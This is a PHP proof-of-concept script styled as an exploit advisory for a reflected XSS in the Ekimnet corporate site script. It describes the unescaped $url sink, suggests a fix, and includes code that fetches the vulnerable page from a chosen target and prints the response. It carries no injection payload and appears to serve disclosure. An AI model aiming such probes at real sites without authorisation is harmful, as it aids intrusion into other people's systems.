#!/usr/bin/php -f
<?php
##################################################################
# Exploit Title : Ekimnet Kurumsal Firma Scripti XSS
# Vendor Homepage : https://ekimnet.com/
# Software Link : https://ekimnet.com/2018-07-21_01-13-17/
#
# Author : z3r0fy
# www.bighatz.org - www.bugcontainer.gq
#
# Using PoC : php -f poc.php http://yourtarget.com
##################################################################
/*
DESCRIPTION
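User input reaches a sensitive sink: $url is built from request-derived values
($_SERVER['HTTP_HOST'] and $_SERVER['PHP_SELF']) and is echoed into the page
without output escaping.
Check index.php
18: echo echo $url; // fonksiyon.php
6: $url = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']); // fonksiyon.php
Mitigation: escape the value for its output context, e.g.
htmlspecialchars($url, ENT_QUOTES, 'UTF-8'), and take the site's base URL from
server-side configuration instead of from request headers.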
*/
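//
// HTTP request: fetch http://<target>/fonksiyon.php and print the response
// body so the echoed $url value can be inspected.
//
// $argv[1] is the target. The usage line passes it with a leading "http://",
// while the request URL below prepends the scheme itself, so a leading
// "http://" and any trailing slash are dropped before the URL is built.
//
if (!isset($argv[1]) || trim($argv[1]) === '') {
    fwrite(STDERR, "Usage: php -f poc.php http://yourtarget.com\n");
    exit(1);
}

$target = rtrim((string) preg_replace('#^http://#i', '', trim($argv[1])), '/');
if ($target === '') {
    fwrite(STDERR, "Usage: php -f poc.php http://yourtarget.com\n");
    exit(1);
}

// The cookie jar used to be "/tmp/cookie_$target": a command-line value was
// spliced into a file path (slashes or ".." change where the file lands) and
// the name was predictable inside a world-writable directory. tempnam()
// creates a unique file that does not depend on the argument.
// The file is left in place after the run, as the original cookie jar was.
$cookieJar = tempnam(sys_get_temp_dir(), 'cookie_');
if ($cookieJar === false) {
    fwrite(STDERR, "Could not create a temporary cookie jar\n");
    exit(1);
}

$ch = curl_init();
if ($ch === false) {
    fwrite(STDERR, "Could not initialise cURL\n");
    exit(1);
}

curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER  => 1,
    CURLOPT_URL             => "http://$target/fonksiyon.php",
    CURLOPT_USERAGENT       => "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
    CURLOPT_TIMEOUT         => 3,
    CURLOPT_LOW_SPEED_LIMIT => 3,
    CURLOPT_LOW_SPEED_TIME  => 3,
    CURLOPT_COOKIEJAR       => $cookieJar,
]);

$buf = curl_exec($ch);
// Read the error text before the handle is released.
$error = ($buf === false) ? curl_error($ch) : '';
curl_close($ch);
unset($ch);

// curl_exec() returns false on failure; report it instead of printing nothing.
if ($buf === false) {
    fwrite(STDERR, "Request failed: $error\n");
    exit(1);
}

// The body is remote, untrusted content written to the terminal unmodified;
// redirect it to a file when control sequences in the response are a concern.
echo $buf;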
?>